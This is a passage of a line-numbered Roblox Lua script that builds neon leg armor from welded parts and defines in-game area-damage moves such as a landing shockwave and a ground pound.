  2652. w7.C1 = CFrame.new(50.0020561, 44.8201294, 14.2623405, -0.766047955, 0.642787397, 1.54832112e-008, -0.642790377, -0.766044199, -6.48163692e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2653. w8 = Instance.new("Weld", p8)
  2654. w8.Name = "Wedge_Weld"
  2655. w8.Part0 = p8
  2656. w8.C0 = CFrame.new(50.0020561, 44.8201294, 14.2623405, -0.766047955, 0.642787397, 1.54832112e-008, -0.642790377, -0.766044199, -6.48163692e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2657. w8.Part1 = p9
  2658. w8.C1 = CFrame.new(67.3029327, -5.90784931, -9.1200285, -1.00000453, 3.57627869e-007, -9.07683528e-008, 2.33116921e-007, 0.906307459, -0.422619879, 7.83834153e-009, -0.42261824, -0.906311214)
  2659. w9 = Instance.new("Weld", p9)
  2660. w9.Name = "Part_Weld"
  2661. w9.Part0 = p9
  2662. w9.C0 = CFrame.new(67.3029327, -5.90784931, -9.1200285, -1.00000453, 3.57627869e-007, -9.07683528e-008, 2.33116921e-007, 0.906307459, -0.422619879, 7.83834153e-009, -0.42261824, -0.906311214)
  2663. w9.Part1 = p10
  2664. w9.C1 = CFrame.new(-68.0029068, -2.00003219, 14.2623405, 1.00000441, -2.08616257e-007, 2.98023135e-008, 5.96046448e-008, 0.999999642, 5.96046412e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2665. w10 = Instance.new("Weld", p10)
  2666. w10.Name = "Part_Weld"
  2667. w10.Part0 = p10
  2668. w10.C0 = CFrame.new(-68.0029068, -2.00003219, 14.2623405, 1.00000441, -2.08616257e-007, 2.98023135e-008, 5.96046448e-008, 0.999999642, 5.96046412e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2669. w10.Part1 = p11
  2670. w10.C1 = CFrame.new(-66.5028687, -1.60003603, 14.2623405, 1.00000417, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999583, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2671. w11 = Instance.new("Weld", p11)
  2672. w11.Name = "Part_Weld"
  2673. w11.Part0 = p11
  2674. w11.C0 = CFrame.new(-66.5028687, -1.60003603, 14.2623405, 1.00000417, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999583, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2675. w11.Part1 = p12
  2676. w11.C1 = CFrame.new(50.8226891, 44.4644012, 14.2623415, -0.766047835, 0.642787337, 1.03502398e-008, -0.642790318, -0.76604414, -5.86991185e-008, -5.96046341e-008, 2.98023224e-008, 1.00000381)
  2677. w12 = Instance.new("Weld", p12)
  2678. w12.Name = "Part_Weld"
  2679. w12.Part0 = p12
  2680. w12.C0 = CFrame.new(50.8226891, 44.4644012, 14.2623415, -0.766047835, 0.642787337, 1.03502398e-008, -0.642790318, -0.76604414, -5.86991185e-008, -5.96046341e-008, 2.98023224e-008, 1.00000381)
  2681. w12.Part1 = p13
  2682. w12.C1 = CFrame.new(-67.0028915, -0.800035119, 14.2623415, 1.00000429, -2.08616257e-007, 2.980231e-008, 1.1920929e-007, 0.999999642, 5.16191463e-008, -5.96046341e-008, 2.98023224e-008, 1.00000381)
  2683. w13 = Instance.new("Weld", p13)
  2684. w13.Name = "Wedge_Weld"
  2685. w13.Part0 = p13
  2686. w13.C0 = CFrame.new(-67.0028915, -0.800035119, 14.2623415, 1.00000429, -2.08616257e-007, 2.980231e-008, 1.1920929e-007, 0.999999642, 5.16191463e-008, -5.96046341e-008, 2.98023224e-008, 1.00000381)
  2687. w13.Part1 = p14
  2688. w13.C1 = CFrame.new(-66.8004532, -0.350028068, 14.7500486, 1.00000429, -2.08616257e-007, 2.33795703e-008, 8.94069672e-008, 0.999999523, 1.11224018e-007, -5.31818927e-008, -2.9802294e-008, 1.00000381)
  2689. w14 = Instance.new("Weld", p14)
  2690. w14.Name = "Wedge_Weld"
  2691. w14.Part0 = p14
  2692. w14.C0 = CFrame.new(-66.8004532, -0.350028068, 14.7500486, 1.00000429, -2.08616257e-007, 2.33795703e-008, 8.94069672e-008, 0.999999523, 1.11224018e-007, -5.31818927e-008, -2.9802294e-008, 1.00000381)
  2693. w14.Part1 = p15
  2694. w14.C1 = CFrame.new(-68.0004578, -0.350028008, 14.7500486, 1.00000429, -2.08616257e-007, 2.33795703e-008, 8.94069672e-008, 0.999999523, 1.11224018e-007, -5.31818927e-008, -2.9802294e-008, 1.00000381)
  2695. w15 = Instance.new("Weld", p15)
  2696. w15.Name = "Wedge_Weld"
  2697. w15.Part0 = p15
  2698. w15.C0 = CFrame.new(-68.0004578, -0.350028008, 14.7500486, 1.00000429, -2.08616257e-007, 2.33795703e-008, 8.94069672e-008, 0.999999523, 1.11224018e-007, -5.31818927e-008, -2.9802294e-008, 1.00000381)
  2699. w15.Part1 = p16
  2700. w15.C1 = CFrame.new(-67.4004517, -0.350028008, 14.7500486, 1.00000429, -2.08616257e-007, 2.33795703e-008, 8.94069672e-008, 0.999999523, 1.11224018e-007, -5.31818927e-008, -2.9802294e-008, 1.00000381)
  2701. m.Parent = rleg
  2702. m:MakeJoints()
  2703. ----------------------------------------------------
  2704. local cor6 = Instance.new("Part", rleg.RightLeg)
  2705. cor6.Name = "Thingy"
  2706. cor6.Locked = true
  2707. cor6.BottomSurface = 0
  2708. cor6.CanCollide = false
  2709. cor6.Size = Vector3.new(2, 1, 1)
  2710. cor6.Transparency = 1
  2711. cor6.TopSurface = 0
  2712. corw2 = Instance.new("Weld", cor6)
  2713. corw2.Part0 = rleg
  2714. corw2.Part1 = cor6
  2715. corw2.C0 = CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0))
  2716. corw2.C1 = CFrame.new(0, 0, 0)
  2717. weld2 = Instance.new("Weld", rleg.RightLeg)
  2718. weld2.Part0 = cor6
  2719. weld2.Part1 = p7
  2720. weld2.C0 = CFrame.new(0, 0, 0)
  2721. ----------------------------------------------------
  2722. local m = Instance.new("Model")
  2723. m.Name = "LeftLeg"
  2724. p1 = Instance.new("WedgePart", m)
  2725. p1.BrickColor = BrickColor.new("Royal purple")
  2726. p1.Material = Enum.Material.Neon
  2727. p1.Name = "Wedge"
  2728. p1.FormFactor = Enum.FormFactor.Custom
  2729. p1.Size = Vector3.new(1, 0.699999809, 1.29999995)
  2730. p1.CFrame = CFrame.new(64.3107605, 2.34980536, -14.7520046, 1.00008786, -7.1526415e-007, 2.00803143e-007, -2.2649931e-006, 0.999990404, 5.36453001e-007, -1.27237047e-006, 7.81809263e-007, 1.00007522)
  2731. p1.CanCollide = false
  2732. p1.Locked = true
  2733. p1.TopSurface = Enum.SurfaceType.Smooth
  2734. b1 = Instance.new("SpecialMesh", p1)
  2735. b1.MeshType = Enum.MeshType.Wedge
  2736. b1.Name = "Mesh"
  2737. b1.Scale = Vector3.new(0.200000003, 1, 1)
  2738. p2 = Instance.new("WedgePart", m)
  2739. p2.BrickColor = BrickColor.new("Royal purple")
  2740. p2.Material = Enum.Material.Neon
  2741. p2.Name = "Wedge"
  2742. p2.FormFactor = Enum.FormFactor.Custom
  2743. p2.Size = Vector3.new(1, 1.19999981, 4)
  2744. p2.CFrame = CFrame.new(64.9138336, 3.49979234, -10.7640553, -1.00009644, -6.38643314e-007, 1.81689501e-007, 2.53323037e-006, 0.906298041, -0.422614515, 1.23479219e-006, -0.422652602, -0.906383216)
  2745. p2.CanCollide = false
  2746. p2.Locked = true
  2747. p2.TopSurface = Enum.SurfaceType.Smooth
  2748. b2 = Instance.new("SpecialMesh", p2)
  2749. b2.MeshType = Enum.MeshType.Wedge
  2750. b2.Name = "Mesh"
  2751. b2.Scale = Vector3.new(0.600000024, 1, 1)
  2752. p3 = Instance.new("Part", m)
  2753. p3.BrickColor = BrickColor.new("Really black")
  2754. p3.Material = Enum.Material.Metal
  2755. p3.Name = "Main"
  2756. p3.FormFactor = Enum.FormFactor.Custom
  2757. p3.Size = Vector3.new(2.20000005, 4.19999981, 2.20000005)
  2758. p3.CFrame = CFrame.new(65.0144501, 3.99976897, -13.1643734, 1.00010526, -9.43461771e-007, 1.5135204e-007, -2.48442234e-006, 0.999988973, 7.74860382e-007, -1.32394814e-006, 8.94069672e-007, 1.00009048)
  2759. p3.CanCollide = false
  2760. p3.Locked = true
  2761. p3.BottomSurface = Enum.SurfaceType.Smooth
  2762. p3.TopSurface = Enum.SurfaceType.Smooth
  2763. p4 = Instance.new("Part", m)
  2764. p4.BrickColor = BrickColor.new("Really black")
  2765. p4.Material = Enum.Material.Neon
  2766. p4.FormFactor = Enum.FormFactor.Custom
  2767. p4.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2768. p4.CFrame = CFrame.new(64.8149185, 4.09976244, -14.2645903, 1.00011396, -1.07351866e-006, 1.23178822e-007, -2.62327239e-006, 0.999988258, 8.64272579e-007, -1.33881622e-006, 1.01328953e-006, 1.00009811)
  2769. p4.CanCollide = false
  2770. p4.Locked = true
  2771. p4.BottomSurface = Enum.SurfaceType.Smooth
  2772. p4.TopSurface = Enum.SurfaceType.Smooth
  2773. b3 = Instance.new("SpecialMesh", p4)
  2774. b3.MeshType = Enum.MeshType.Sphere
  2775. b3.Name = "Mesh"
  2776. p5 = Instance.new("WedgePart", m)
  2777. p5.BrickColor = BrickColor.new("Royal purple")
  2778. p5.Material = Enum.Material.Neon
  2779. p5.Name = "Wedge"
  2780. p5.FormFactor = Enum.FormFactor.Custom
  2781. p5.Size = Vector3.new(1, 0.699999809, 1.29999995)
  2782. p5.CFrame = CFrame.new(64.9130707, 2.34976578, -14.7524614, 1.00012243, -1.19274011e-006, 9.97973828e-008, -2.74250215e-006, 0.999987364, 8.94081438e-007, -1.37342522e-006, 1.15432931e-006, 1.00010574)
  2783. p5.CanCollide = false
  2784. p5.Locked = true
  2785. p5.TopSurface = Enum.SurfaceType.Smooth
  2786. b4 = Instance.new("SpecialMesh", p5)
  2787. b4.MeshType = Enum.MeshType.Wedge
  2788. b4.Name = "Mesh"
  2789. b4.Scale = Vector3.new(0.200000003, 1, 1)
  2790. p6 = Instance.new("Part", m)
  2791. p6.BrickColor = BrickColor.new("Royal purple")
  2792. p6.Material = Enum.Material.Neon
  2793. p6.FormFactor = Enum.FormFactor.Custom
  2794. p6.Size = Vector3.new(0.200000048, 1.29999971, 0.200000048)
  2795. p6.CFrame = CFrame.new(65.1539307, 3.56787443, -14.2648125, -0.81925869, 0.573652625, 6.3568308e-008, -0.573566198, -0.819142461, 1.03511331e-006, 4.69596898e-007, -1.7646264e-006, 1.00011337)
  2796. p6.CanCollide = false
  2797. p6.Locked = true
  2798. p6.BottomSurface = Enum.SurfaceType.Smooth
  2799. p6.TopSurface = Enum.SurfaceType.Smooth
  2800. p7 = Instance.new("Part", m)
  2801. p7.BrickColor = BrickColor.new("Royal purple")
  2802. p7.Material = Enum.Material.Neon
  2803. p7.FormFactor = Enum.FormFactor.Custom
  2804. p7.Size = Vector3.new(0.200000048, 0.999999642, 0.200000048)
  2805. p7.CFrame = CFrame.new(64.9899063, 4.4266243, -14.2649202, 0.86614728, 0.500068843, 4.87115699e-008, -0.499995351, 0.866011381, 1.14634361e-006, -1.86828663e-006, 3.82691809e-007, 1.000121)
  2806. p7.CanCollide = false
  2807. p7.Locked = true
  2808. p7.BottomSurface = Enum.SurfaceType.Smooth
  2809. p7.TopSurface = Enum.SurfaceType.Smooth
  2810. p8 = Instance.new("Part", m)
  2811. p8.BrickColor = BrickColor.new("Really black")
  2812. p8.Material = Enum.Material.Neon
  2813. p8.FormFactor = Enum.FormFactor.Custom
  2814. p8.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2815. p8.CFrame = CFrame.new(65.2172623, 4.89969873, -14.2650318, 1.00014877, -1.43051147e-006, 2.05365609e-008, -3.09944153e-006, 0.99998486, 1.2357583e-006, -1.44150738e-006, 1.38478742e-006, 1.00012863)
  2816. p8.CanCollide = false
  2817. p8.Locked = true
  2818. p8.BottomSurface = Enum.SurfaceType.Smooth
  2819. p8.TopSurface = Enum.SurfaceType.Smooth
  2820. b5 = Instance.new("SpecialMesh", p8)
  2821. b5.MeshType = Enum.MeshType.Sphere
  2822. b5.Name = "Mesh"
  2823. p9 = Instance.new("Part", m)
  2824. p9.BrickColor = BrickColor.new("Really black")
  2825. p9.Material = Enum.Material.Neon
  2826. p9.FormFactor = Enum.FormFactor.Custom
  2827. p9.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2828. p9.CFrame = CFrame.new(65.517868, 2.99971151, -14.2651463, 1.00015736, -1.5520751e-006, -9.27031252e-009, -3.21633729e-006, 0.999984026, 1.32517368e-006, -1.46969478e-006, 1.46621869e-006, 1.00013626)
  2829. p9.CanCollide = false
  2830. p9.Locked = true
  2831. p9.BottomSurface = Enum.SurfaceType.Smooth
  2832. p9.TopSurface = Enum.SurfaceType.Smooth
  2833. b6 = Instance.new("SpecialMesh", p9)
  2834. b6.MeshType = Enum.MeshType.Sphere
  2835. b6.Name = "Mesh"
  2836. p10 = Instance.new("Part", m)
  2837. p10.BrickColor = BrickColor.new("Royal purple")
  2838. p10.Material = Enum.Material.Neon
  2839. p10.FormFactor = Enum.FormFactor.Custom
  2840. p10.Size = Vector3.new(0.200000048, 1.09999967, 0.200000048)
  2841. p10.CFrame = CFrame.new(64.79879, 5.1497221, -14.2652512, -0.642893076, 0.766172707, -3.7446263e-008, -0.766029418, -0.64277941, 1.40660427e-006, -2.27817864e-007, -2.14863894e-006, 1.00014389)
  2842. p10.CanCollide = false
  2843. p10.Locked = true
  2844. p10.BottomSurface = Enum.SurfaceType.Smooth
  2845. p10.TopSurface = Enum.SurfaceType.Smooth
  2846. p11 = Instance.new("Part", m)
  2847. p11.BrickColor = BrickColor.new("Royal purple")
  2848. p11.Material = Enum.Material.Neon
  2849. p11.FormFactor = Enum.FormFactor.Custom
  2850. p11.Size = Vector3.new(0.200000048, 0.699999809, 0.200000048)
  2851. p11.CFrame = CFrame.new(65.2189484, 5.30325174, -14.2653618, 1.00017476, -1.78813934e-006, -6.56227002e-008, -3.4570694e-006, 0.999982595, 1.49602079e-006, -1.52770292e-006, 1.64505627e-006, 1.00015152)
  2852. p11.CanCollide = false
  2853. p11.Locked = true
  2854. p11.BottomSurface = Enum.SurfaceType.Smooth
  2855. p11.TopSurface = Enum.SurfaceType.Smooth
  2856. p12 = Instance.new("WedgePart", m)
  2857. p12.BrickColor = BrickColor.new("Royal purple")
  2858. p12.Material = Enum.Material.Neon
  2859. p12.Name = "Wedge"
  2860. p12.FormFactor = Enum.FormFactor.Custom
  2861. p12.Size = Vector3.new(1, 0.699999809, 1.29999995)
  2862. p12.CFrame = CFrame.new(65.5171509, 2.34969687, -14.7532635, 1.00018334, -1.89246384e-006, -8.90070169e-008, -3.54650388e-006, 0.999981821, 1.52583425e-006, -1.56231545e-006, 1.78610321e-006, 1.00015914)
  2863. p12.CanCollide = false
  2864. p12.Locked = true
  2865. p12.TopSurface = Enum.SurfaceType.Smooth
  2866. b7 = Instance.new("SpecialMesh", p12)
  2867. b7.MeshType = Enum.MeshType.Wedge
  2868. b7.Name = "Mesh"
  2869. b7.Scale = Vector3.new(0.200000003, 1, 1)
  2870. p13 = Instance.new("Part", m)
  2871. p13.BrickColor = BrickColor.new("Really black")
  2872. p13.Material = Enum.Material.Neon
  2873. p13.FormFactor = Enum.FormFactor.Custom
  2874. p13.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2875. p13.CFrame = CFrame.new(64.3198929, 5.59963703, -14.2655821, 1.00019193, -1.97098893e-006, -1.23608402e-007, -3.67657594e-006, 0.999981046, 1.66687016e-006, -1.58571254e-006, 1.81590929e-006, 1.00016677)
  2876. p13.CanCollide = false
  2877. p13.Locked = true
  2878. p13.BottomSurface = Enum.SurfaceType.Smooth
  2879. p13.TopSurface = Enum.SurfaceType.Smooth
  2880. b8 = Instance.new("SpecialMesh", p13)
  2881. b8.MeshType = Enum.MeshType.Sphere
  2882. b8.Name = "Mesh"
  2883. p14 = Instance.new("Part", m)
  2884. p14.BrickColor = BrickColor.new("Really black")
  2885. p14.Material = Enum.Material.Neon
  2886. p14.FormFactor = Enum.FormFactor.Custom
  2887. p14.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2888. p14.CFrame = CFrame.new(65.2206192, 5.79961872, -14.2656937, 1.00020039, -2.10105645e-006, -1.51786239e-007, -3.75511786e-006, 0.99998033, 1.7562885e-006, -1.6139021e-006, 1.90533035e-006, 1.0001744)
  2889. p14.CanCollide = false
  2890. p14.Locked = true
  2891. p14.BottomSurface = Enum.SurfaceType.Smooth
  2892. p14.TopSurface = Enum.SurfaceType.Smooth
  2893. b9 = Instance.new("SpecialMesh", p14)
  2894. b9.MeshType = Enum.MeshType.Sphere
  2895. b9.Name = "Mesh"
  2896. w1 = Instance.new("Weld", p1)
  2897. w1.Name = "Wedge_Weld"
  2898. w1.Part0 = p1
  2899. w1.C0 = CFrame.new(-64.3004303, -0.350028396, 14.7500486, 1.00000429, -2.08616257e-007, 2.33795703e-008, 8.94069672e-008, 0.999999523, 1.11224018e-007, -5.31818927e-008, -2.9802294e-008, 1.00000381)
  2900. w1.Part1 = p2
  2901. w1.C1 = CFrame.new(64.9028854, -5.90785694, -9.12002754, -1.00000429, 3.57627869e-007, -9.07683386e-008, 2.9341092e-007, 0.906307459, -0.422619879, -5.58450353e-009, -0.42261821, -0.906311214)
  2902. w2 = Instance.new("Weld", p2)
  2903. w2.Name = "Part_Weld"
  2904. w2.Part0 = p2
  2905. w2.C0 = CFrame.new(64.9028854, -5.90785694, -9.12002754, -1.00000429, 3.57627869e-007, -9.07683386e-008, 2.9341092e-007, 0.906307459, -0.422619879, -5.58450353e-009, -0.42261821, -0.906311214)
  2906. w2.Part1 = p3
  2907. w2.C1 = CFrame.new(-65.0029144, -2.00002885, 13.1623335, 1.00000453, -2.19451294e-007, 2.98023295e-008, 6.97858056e-008, 0.999999702, 5.96046448e-008, -4.46573551e-008, 5.96046448e-008, 1.00000381)
  2908. w3 = Instance.new("Weld", p3)
  2909. w3.Name = "Part_Weld"
  2910. w3.Part0 = p3
  2911. w3.C0 = CFrame.new(-65.0029144, -2.00002885, 13.1623335, 1.00000453, -2.19451294e-007, 2.98023295e-008, 6.97858056e-008, 0.999999702, 5.96046448e-008, -4.46573551e-008, 5.96046448e-008, 1.00000381)
  2912. w3.Part1 = p4
  2913. w3.C1 = CFrame.new(-64.8028488, -2.10003614, 14.2623415, 1.00000417, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999583, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2914. w4 = Instance.new("Weld", p4)
  2915. w4.Name = "Wedge_Weld"
  2916. w4.Part0 = p4
  2917. w4.C0 = CFrame.new(-64.8028488, -2.10003614, 14.2623415, 1.00000417, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999583, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2918. w4.Part1 = p5
  2919. w4.C1 = CFrame.new(-64.9004364, -0.350028336, 14.7500486, 1.00000429, -2.08616257e-007, 2.33795703e-008, 8.94069672e-008, 0.999999523, 1.11224018e-007, -5.31818927e-008, -2.9802294e-008, 1.00000381)
  2920. w5 = Instance.new("Weld", p5)
  2921. w5.Name = "Part_Weld"
  2922. w5.Part0 = p5
  2923. w5.C0 = CFrame.new(-64.9004364, -0.350028336, 14.7500486, 1.00000429, -2.08616257e-007, 2.33795703e-008, 8.94069672e-008, 0.999999523, 1.11224018e-007, -5.31818927e-008, -2.9802294e-008, 1.00000381)
  2924. w5.Part1 = p6
  2925. w5.C1 = CFrame.new(54.2596054, -36.0786095, 14.2623415, -0.819155633, -0.573575974, -5.40201484e-008, 0.573578835, -0.819151759, -2.51900261e-008, -5.96046341e-008, 2.98023224e-008, 1.00000381)
  2926. w6 = Instance.new("Weld", p6)
  2927. w6.Name = "Part_Weld"
  2928. w6.Part0 = p6
  2929. w6.C0 = CFrame.new(54.2596054, -36.0786095, 14.2623415, -0.819155633, -0.573575974, -5.40201484e-008, 0.573578835, -0.819151759, -2.51900261e-008, -5.96046341e-008, 2.98023224e-008, 1.00000381)
  2930. w6.Part1 = p7
  2931. w6.C1 = CFrame.new(-55.0575066, -34.589859, 14.2623396, 0.866029263, -0.50000006, -3.99274924e-009, 0.500002325, 0.866025031, 6.65203004e-008, -4.46573551e-008, 5.96046448e-008, 1.00000381)
  2932. w7 = Instance.new("Weld", p7)
  2933. w7.Name = "Part_Weld"
  2934. w7.Part0 = p7
  2935. w7.C0 = CFrame.new(-55.0575066, -34.589859, 14.2623396, 0.866029263, -0.50000006, -3.99274924e-009, 0.500002325, 0.866025031, 6.65203004e-008, -4.46573551e-008, 5.96046448e-008, 1.00000381)
  2936. w7.Part1 = p8
  2937. w7.C1 = CFrame.new(-65.2028809, -2.90003395, 14.2623415, 1.00000429, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999642, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2938. w8 = Instance.new("Weld", p8)
  2939. w8.Name = "Part_Weld"
  2940. w8.Part0 = p8
  2941. w8.C0 = CFrame.new(-65.2028809, -2.90003395, 14.2623415, 1.00000429, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999642, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2942. w8.Part1 = p9
  2943. w8.C1 = CFrame.new(-65.5028763, -1.00002885, 14.2623425, 1.00000429, -2.06278372e-007, 2.98023135e-008, 8.70690755e-008, 0.999999523, 5.16191463e-008, -5.96046341e-008, 2.98023224e-008, 1.00000381)
  2944. w9 = Instance.new("Weld", p9)
  2945. w9.Name = "Part_Weld"
  2946. w9.Part0 = p9
  2947. w9.C0 = CFrame.new(-65.5028763, -1.00002885, 14.2623425, 1.00000429, -2.06278372e-007, 2.98023135e-008, 8.70690755e-008, 0.999999523, 5.16191463e-008, -5.96046341e-008, 2.98023224e-008, 1.00000381)
  2948. w9.Part1 = p10
  2949. w9.C1 = CFrame.new(44.0550385, -47.6020889, 14.2623405, -0.642790556, -0.766044021, -6.48163621e-008, 0.766047776, -0.642787576, -1.54832289e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2950. w10 = Instance.new("Weld", p10)
  2951. w10.Name = "Part_Weld"
  2952. w10.Part0 = p10
  2953. w10.C0 = CFrame.new(44.0550385, -47.6020889, 14.2623405, -0.642790556, -0.766044021, -6.48163621e-008, 0.766047776, -0.642787576, -1.54832289e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2954. w10.Part1 = p11
  2955. w10.C1 = CFrame.new(-65.2028656, -3.3036263, 14.2623405, 1.00000429, -1.93715096e-007, 2.98023153e-008, 1.1920929e-007, 0.999999702, 5.96046412e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2956. w11 = Instance.new("Weld", p11)
  2957. w11.Name = "Wedge_Weld"
  2958. w11.Part0 = p11
  2959. w11.C0 = CFrame.new(-65.2028656, -3.3036263, 14.2623405, 1.00000429, -1.93715096e-007, 2.98023153e-008, 1.1920929e-007, 0.999999702, 5.96046412e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2960. w11.Part1 = p12
  2961. w11.C1 = CFrame.new(-65.5004425, -0.350028276, 14.7500486, 1.00000429, -2.08616257e-007, 2.33795703e-008, 8.94069672e-008, 0.999999523, 1.11224018e-007, -5.31818927e-008, -2.9802294e-008, 1.00000381)
  2962. w12 = Instance.new("Weld", p12)
  2963. w12.Name = "Part_Weld"
  2964. w12.Part0 = p12
  2965. w12.C0 = CFrame.new(-65.5004425, -0.350028276, 14.7500486, 1.00000429, -2.08616257e-007, 2.33795703e-008, 8.94069672e-008, 0.999999523, 1.11224018e-007, -5.31818927e-008, -2.9802294e-008, 1.00000381)
  2966. w12.Part1 = p13
  2967. w12.C1 = CFrame.new(-64.3028641, -3.60003614, 14.2623415, 1.00000429, -2.19451294e-007, 2.98023153e-008, 1.30103487e-007, 0.999999702, 5.96046448e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2968. w13 = Instance.new("Weld", p13)
  2969. w13.Name = "Part_Weld"
  2970. w13.Part0 = p13
  2971. w13.C0 = CFrame.new(-64.3028641, -3.60003614, 14.2623415, 1.00000429, -2.19451294e-007, 2.98023153e-008, 1.30103487e-007, 0.999999702, 5.96046448e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2972. w13.Part1 = p14
  2973. w13.C1 = CFrame.new(-65.202858, -3.80003428, 14.2623415, 1.00000417, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999583, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2974. w14 = Instance.new("Weld", p14)
  2975. w14.Name = "Wedge_Weld"
  2976. w14.Part0 = p14
  2977. w14.C0 = CFrame.new(-65.202858, -3.80003428, 14.2623415, 1.00000417, -2.08616257e-007, 2.98023117e-008, 8.94069672e-008, 0.999999583, 5.96046377e-008, -5.79734909e-008, 2.98023224e-008, 1.00000381)
  2978. m.Parent = lleg
  2979. m:MakeJoints()
  2980. ----------------------------------------------------
  2981. local cor7 = Instance.new("Part", lleg.LeftLeg)
  2982. cor7.Name = "Thingy"
  2983. cor7.Locked = true
  2984. cor7.BottomSurface = 0
  2985. cor7.CanCollide = false
  2986. cor7.Size = Vector3.new(2, 1, 1)
  2987. cor7.Transparency = 1
  2988. cor7.TopSurface = 0
  2989. corw2 = Instance.new("Weld", cor7)
  2990. corw2.Part0 = lleg
  2991. corw2.Part1 = cor7
  2992. corw2.C0 = CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0))
  2993. corw2.C1 = CFrame.new(0, 0, 0)
  2994. weld2 = Instance.new("Weld", lleg.LeftLeg)
  2995. weld2.Part0 = cor7
  2996. weld2.Part1 = p3
  2997. weld2.C0 = CFrame.new(0, 0, 0)
  2998. ----------------------------------------------------
  2999. function weld5(part0, part1, c0, c1)
  3000. weeld=Instance.new("Weld", part0)
  3001. weeld.Part0=part0
  3002. weeld.Part1=part1
  3003. weeld.C0=c0
  3004. weeld.C1=c1
  3005. return weeld
  3006. end
  3007. ----------------------------------------------------
  3008. function newRay(start,face,range,wat)
  3009. local rey=Ray.new(start.p,(face.p-start.p).Unit*range)
  3010. hit,pos=Workspace:FindPartOnRayWithIgnoreList(rey,wat)
  3011. return rey,hit,pos
  3012. end
  3013. ----------------------------------------------------
  3014. mod5 = Instance.new("Model",char)
  3015.  
  3016. function FindNearestTorso(Position,Distance,SinglePlayer)
  3017. if SinglePlayer then return(SinglePlayer.Torso.CFrame.p -Position).magnitude < Distance end
  3018. local List = {}
  3019. for i,v in pairs(workspace:GetChildren())do
  3020. if v:IsA("Model")then
  3021. if v:findFirstChild("Torso")then
  3022. if v ~= char then
  3023. if(v.Torso.Position -Position).magnitude <= Distance then
  3024. table.insert(List,v)
  3025. end
  3026. end
  3027. end
  3028. end
  3029. end
  3030. return List
  3031. end
  3032.  
  3033. function Landing()
  3034. part=Instance.new('Part',mod5)
  3035. part.Anchored=true
  3036. part.CanCollide=false
  3037. part.FormFactor='Custom'
  3038. part.Size=Vector3.new(.2,.2,.2)
  3039. part.CFrame=root.CFrame*CFrame.new(0,-2,0)
  3040. part.Transparency=.7
  3041. part.BrickColor=BrickColor.new('Really black')
  3042. part2=part:clone()
  3043. part2.Parent = mod5
  3044. part2.BrickColor=BrickColor.new('Royal purple')
  3045. mesh=Instance.new('SpecialMesh',part)
  3046. mesh.MeshId='http://www.roblox.com/asset/?id=20329976'
  3047. mesh.Scale=Vector3.new(10,5,10)
  3048. mesh2=mesh:clone()
  3049. mesh2.Parent=part2
  3050. mesh2.Scale=Vector3.new(12, 6, 12)
  3051.  
  3052. for i,v in pairs(FindNearestTorso(torso.CFrame.p,30))do
  3053. if v:FindFirstChild('Humanoid') then
  3054. v.Humanoid:TakeDamage(math.random(99999999,99999999))
  3055. v.Humanoid.PlatformStand = true
  3056. v:FindFirstChild("Torso").Velocity = hed.CFrame.lookVector * 30
  3057. end
  3058. end
  3059.  
  3060. coroutine.resume(coroutine.create(function()
  3061. for i=0,3.8,0.05 do
  3062. wait()
  3063. part.CFrame=part.CFrame
  3064. part.Transparency=i
  3065. part2.CFrame=part2.CFrame
  3066. part2.Transparency=i
  3067. mesh.Scale=mesh.Scale+Vector3.new(1,0.2,1)
  3068. mesh2.Scale=mesh2.Scale+Vector3.new(1.2,0.3,1.2)
  3069. end
  3070. part.Parent = nil
  3071. end))
  3072. end
  3073. ----------------------------------------------------
  3074. mod4 = Instance.new("Model",char)
  3075.  
  3076. ptez = {0.7, 0.8, 0.9, 1}
  3077.  
  3078. function FindNearestTorso(Position,Distance,SinglePlayer)
  3079. if SinglePlayer then return(SinglePlayer.Torso.CFrame.p -Position).magnitude < Distance end
  3080. local List = {}
  3081. for i,v in pairs(workspace:GetChildren())do
  3082. if v:IsA("Model")then
  3083. if v:findFirstChild("Torso")then
  3084. if v ~= char then
  3085. if(v.Torso.Position -Position).magnitude <= Distance then
  3086. table.insert(List,v)
  3087. end
  3088. end
  3089. end
  3090. end
  3091. end
  3092. return List
  3093. end
  3094.  
  3095. function GroundPound()
  3096. part=Instance.new('Part',mod4)
  3097. part.Anchored=true
  3098. part.CanCollide=false
  3099. part.FormFactor='Custom'
  3100. part.Size=Vector3.new(.2,.2,.2)
  3101. part.CFrame=root.CFrame*CFrame.new(0,-5.8,-2.4)*CFrame.Angles(math.rad(90),0,0)
  3102. part.Transparency=.7
